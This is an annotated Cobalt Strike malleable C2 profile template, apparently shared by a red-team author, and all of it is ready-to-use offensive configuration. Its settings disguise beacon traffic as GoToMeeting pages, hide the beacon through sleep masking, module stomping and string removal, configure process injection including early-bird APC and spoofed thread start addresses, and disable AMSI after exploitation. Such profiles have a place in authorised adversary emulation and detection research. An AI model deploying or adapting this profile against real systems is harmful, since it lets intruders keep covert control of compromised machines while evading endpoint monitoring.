384 lines
12 KiB
Plaintext
384 lines
12 KiB
Plaintext
#template profile - updated with 3.14 options
|
|
#options from https://www.cobaltstrike.com/help-malleable-c2 and https://www.cobaltstrike.com/help-malleable-postex
|
|
#attempt to get everything in one place with examples.
|
|
#xx0hcd
|
|
|
|
###global options###
|
|
|
|
#shows profile name in reports.
|
|
set sample_name "whatever.profile";
|
|
|
|
set sleeptime "37500";
|
|
set jitter "33";
|
|
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
|
|
|
|
#set true to use staged payloads, false to disable staged payloads.
|
|
#set host_stage "false";
|
|
|
|
###DNS options###
|
|
set dns_idle "8.8.8.8";
|
|
set maxdns "245";
|
|
set dns_sleep "0";
|
|
set dns_stager_prepend "";
|
|
set dns_stager_subhost "";
|
|
set dns_max_txt "252";
|
|
set dns_ttl "1";
|
|
|
|
###SMB options###
|
|
#use different strings for pipename and pipename_stager.
|
|
set pipename "ntsvcs";
|
|
set pipename_stager "scerpc";
|
|
|
|
###TCP options###
|
|
set tcp_port "8000";
|
|
|
|
###SSL Options###
|
|
#custom cert
|
|
#https-certificate {
|
|
#set keystore "your_store_file.store";
|
|
#set password "your_store_pass";
|
|
#}
|
|
|
|
#self sign cert
|
|
https-certificate {
|
|
set C "US";
|
|
set CN "whatever.com";
|
|
set L "California";
|
|
set O "whatever LLC.";
|
|
set OU "local.org";
|
|
set ST "CA";
|
|
set validity "365";
|
|
}
|
|
|
|
#code sign cert.
|
|
#code-signer {
|
|
#set keystore "your_keystore.jks";
|
|
#set password "your_password";
|
|
#set alias "server";
|
|
#}
|
|
|
|
###HTTP-Config Block###
|
|
#Order of server response headers. Or you can just fill them in manually under the server blocks.
|
|
http-config {
|
|
set headers "Server, Content-Type, Cache-Control, Connection";
|
|
header "Content-Type" "text/html;charset=UTF-8";
|
|
header "Connection" "close";
|
|
header "Cache-Control" "max-age=2";
|
|
header "Server" "nginx";
|
|
#set "true" if teamserver is behind redirector
|
|
set trust_x_forwarded_for "false";
|
|
}
|
|
|
|
###HTTP-GET Block###
|
|
#the http-get block checks if there are tasks queued.
|
|
http-get {
|
|
|
|
#You can specifiy multiple URI's with space between them.
|
|
set uri "/login /config /admin";
|
|
|
|
#default method is GET.
|
|
set verb "GET";
|
|
#set verb "POST";
|
|
|
|
client {
|
|
|
|
#Set headers based on traffic capture/Burp/etc.
|
|
header "Host" "whatever.com";
|
|
header "Accept" "*/*";
|
|
header "Accept-Language" "en-US";
|
|
header "Connection" "close";
|
|
|
|
|
|
metadata {
|
|
#Encoding options = append "string", base64, base64url, mask, netbios, netbiosu, prepend "string".
|
|
#base64
|
|
base64url;
|
|
#mask;
|
|
#netbios;
|
|
#netbiosu;
|
|
#prepend "TEST123";
|
|
append ".php";
|
|
|
|
#Termination statements = header "header", parameter "key", print, uri-append.
|
|
parameter "file";
|
|
#header "Cookie";
|
|
#uri-append;
|
|
#Have to set verb to POST if you want to use print in the client GET block.
|
|
#print;
|
|
|
|
|
|
}
|
|
|
|
#You can also add parameter values just to help mimic your site traffic.
|
|
parameter "test1" "test2";
|
|
|
|
}
|
|
|
|
server {
|
|
#headers are defined in the http-config block above, or you can set them manually here.
|
|
#header "Server" "nginx";
|
|
|
|
#the output keyword allows you to prepend/append data, to add site traffic, etc.
|
|
output {
|
|
|
|
netbios;
|
|
#netbiosu;
|
|
#base64;
|
|
#base64url;
|
|
#mask;
|
|
|
|
|
|
#Use prepend and append to mix your data in with normal looking site traffic. Escape double quotes and you can also use '\n'. c2lint shows '\n' as a period, but you can run it through Burp or pcap a HTTP payload to make sure everything is lining up correctly. Prepend strings need to be entered in reverse order, so the first string here is '"<!DOCTYPE html>\n";'.
|
|
prepend "content=";
|
|
prepend "<meta name=\"google-site-verification\"\n";
|
|
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
|
|
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
|
|
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
|
|
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
|
|
prepend " <meta charset=\"UTF-8\">\n";
|
|
prepend " <head>\n";
|
|
prepend "<html lang=\"en\">\n";
|
|
prepend "<!DOCTYPE html>\n";
|
|
|
|
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
|
|
append "<script type=\"text/javascript\">\n";
|
|
append " var _kiq = _kiq || [];\n";
|
|
append " (function(){\n";
|
|
append " setTimeout(function(){\n";
|
|
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
|
|
append "d.createElement('script'); s.type = 'text/javascript';\n";
|
|
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
|
|
append "f.parentNode.insertBefore(s, f);\n";
|
|
append " }, 1);\n";
|
|
append "})();\n";
|
|
append "</script>\n";
|
|
append "</body>\n";
|
|
append "</html>\n";
|
|
|
|
#All server blocks use 'print' to termintate.
|
|
print;
|
|
}
|
|
}
|
|
}
|
|
|
|
###HTTP-Post Block###
|
|
#The same transform and termination rules apply as the client GET section above.
|
|
#if tasks are queued then http-post block processes them.
|
|
http-post {
|
|
|
|
#URI's cannot be the same as the http-get block URI's, even changing one case is fine.
|
|
set uri "/Login /Config /Admin";
|
|
set verb "GET";
|
|
#set verb "POST";
|
|
|
|
client {
|
|
|
|
|
|
header "Host" "whatever.com";
|
|
header "Accept" "*/*";
|
|
header "Accept-Language" "en";
|
|
header "Connection" "close";
|
|
|
|
output {
|
|
base64url;
|
|
parameter "testParam";
|
|
}
|
|
|
|
#You can put the beacon id in - parameter "key", header "header",
|
|
#cannot add transform statements to beacon id.
|
|
id {
|
|
base64url;
|
|
parameter "id";
|
|
#header "ID-Header":
|
|
|
|
}
|
|
}
|
|
|
|
server {
|
|
#headers are defined in the http-config block above, or you can set them manually here.
|
|
#header "Server" "nginx";
|
|
|
|
output {
|
|
netbios;
|
|
|
|
prepend "content=";
|
|
prepend "<meta name=\"google-site-verification\"\n";
|
|
prepend "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n";
|
|
prepend "<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n";
|
|
prepend "<link rel=\"canonical\" href=\"https://www.gotomeeting.com/b\">\n";
|
|
prepend "<title>Online Meeting Software with HD Video Conferencing | GoToMeeting</title>\n";
|
|
prepend " <meta charset=\"UTF-8\">\n";
|
|
prepend " <head>\n";
|
|
prepend "<html lang=\"en\">\n";
|
|
prepend "<!DOCTYPE html>\n";
|
|
|
|
append "\n<meta name=\"msvalidate.01\" content=\"63E628E67E6AD849F4185FA9AA7ABACA\">\n";
|
|
append "<script type=\"text/javascript\">\n";
|
|
append " var _kiq = _kiq || [];\n";
|
|
append " (function(){\n";
|
|
append " setTimeout(function(){\n";
|
|
append " var d = document, f = d.getElementsByTagName('script')[0], s =\n";
|
|
append "d.createElement('script'); s.type = 'text/javascript';\n";
|
|
append " s.async = true; s.src = '//s3.amazonaws.com/ki.js/66992/fWl.js';\n";
|
|
append "f.parentNode.insertBefore(s, f);\n";
|
|
append " }, 1);\n";
|
|
append "})();\n";
|
|
append "</script>\n";
|
|
append "</body>\n";
|
|
append "</html>\n";
|
|
print;
|
|
}
|
|
}
|
|
}
|
|
|
|
###HTTP-Stager Block###
|
|
#Options to set if you are using a staged payload.
|
|
http-stager {
|
|
|
|
#Same URI rules apply as above, can't have URI's that match in any other client block.
|
|
set uri_x86 "/Console";
|
|
set uri_x64 "/console";
|
|
|
|
client {
|
|
header "Host" "whatever.com";
|
|
header "Accept" "*/*";
|
|
header "Accept-Language" "en-US";
|
|
header "Connection" "close";
|
|
|
|
#can use a parameter as well
|
|
parameter "test1" "test2";
|
|
}
|
|
|
|
server {
|
|
#headers are defined in the http-config block above, or you can set them manually here.
|
|
#header "Server" "nginx";
|
|
|
|
output {
|
|
|
|
prepend "content=";
|
|
|
|
append "</script>\n";
|
|
print;
|
|
}
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
###Malleable PE/Stage Block###
|
|
#use peclone on the dll you want to use, this example uses wwanmm.dll. You can also set the values manually.
|
|
#don't use 'set image_size_xx' if using 'set module_xx'. During testing it seemed to double the size of my payload causing module stomp to fail, need to test it out more though.
|
|
stage {
|
|
set checksum "0";
|
|
set compile_time "25 Oct 2016 01:57:23";
|
|
set entry_point "170000";
|
|
#set image_size_x86 "6586368";
|
|
#set image_size_x64 "6586368";
|
|
#set name "WWanMM.dll";
|
|
set userwx "false";
|
|
set cleanup "true";
|
|
set sleep_mask "true";
|
|
set stomppe "true";
|
|
set obfuscate "true";
|
|
set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
|
|
|
#obfuscate beacon before sleep.
|
|
set sleep_mask "true";
|
|
|
|
#module stomp. Make sure the dll you use is bigger than your payload and test it with post exploit options to make sure everything is working.
|
|
|
|
set module_x86 "wwanmm.dll";
|
|
set module_x64 "wwanmm.dll";
|
|
|
|
#transform allows you to remove, replace, and add strings to beacon's reflective dll stage.
|
|
transform-x86 {
|
|
prepend "\x90\x90\x90";
|
|
strrep "ReflectiveLoader" "";
|
|
strrep "beacon.dll" "";
|
|
}
|
|
|
|
transform-x64 {
|
|
prepend "\x90\x90\x90";
|
|
strrep "ReflectiveLoader" "";
|
|
strrep "beacon.x64.dll" "";
|
|
}
|
|
|
|
#can set a string in the .rdata section of the beacon dll.
|
|
#adds a zero-terminated string
|
|
#string "something";
|
|
|
|
#adds a string 'as-is'
|
|
#data "something";
|
|
|
|
#adds a wide (UTF-16LE encoded) string
|
|
stringw "something";
|
|
}
|
|
|
|
###Process Inject Block###
|
|
#controls process injection behavior
|
|
process-inject {
|
|
|
|
#Can use NtMapViewOfSection or VirtualAllocEx
|
|
#NtMapViewOfSection only allows same arch to same arch process injection.
|
|
set allocator "NtMapViewOfSection";
|
|
|
|
set min_alloc "16700";
|
|
|
|
set userwx "false";
|
|
|
|
set startrwx "true";
|
|
|
|
#prepend has to be valid code for current arch
|
|
transform-x86 {
|
|
prepend "\x90\x90\x90";
|
|
}
|
|
transform-x64 {
|
|
prepend "\x90\x90\x90";
|
|
}
|
|
|
|
execute {
|
|
#Options to spoof start address for CreateThread and CreateRemoteThread, +0x<nums> for offset added to start address. docs recommend ntdll and kernel32 using remote process.
|
|
|
|
#start address does not point to the current process space, fires SYSMON 8 events
|
|
#CreateThread;
|
|
#CreateRemoteThread;
|
|
|
|
#self injection
|
|
CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
|
|
|
|
#suspended process in post-ex jobs, takes over primary thread of temp process
|
|
SetThreadContext;
|
|
|
|
#early bird technique, creates a suspended process, queues an APC call to the process, resumes main thread to execute the APC.
|
|
NtQueueApcThread-s;
|
|
|
|
#uses an RWX stub, uses CreateThread with start address that stands out, same arch injection only.
|
|
#NtQueueApcThread;
|
|
|
|
#no cross session
|
|
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
|
|
|
|
#uses an RWX stub, fires SYSMON 8 events, does allow x86->x64 injection.
|
|
RtlCreateUserThread;
|
|
}
|
|
}
|
|
|
|
###Post-Ex Block###
|
|
post-ex {
|
|
|
|
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
|
|
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
|
|
|
|
set obfuscate "true";
|
|
|
|
set smartinject "true";
|
|
|
|
set amsi_disable "true";
|
|
|
|
}
|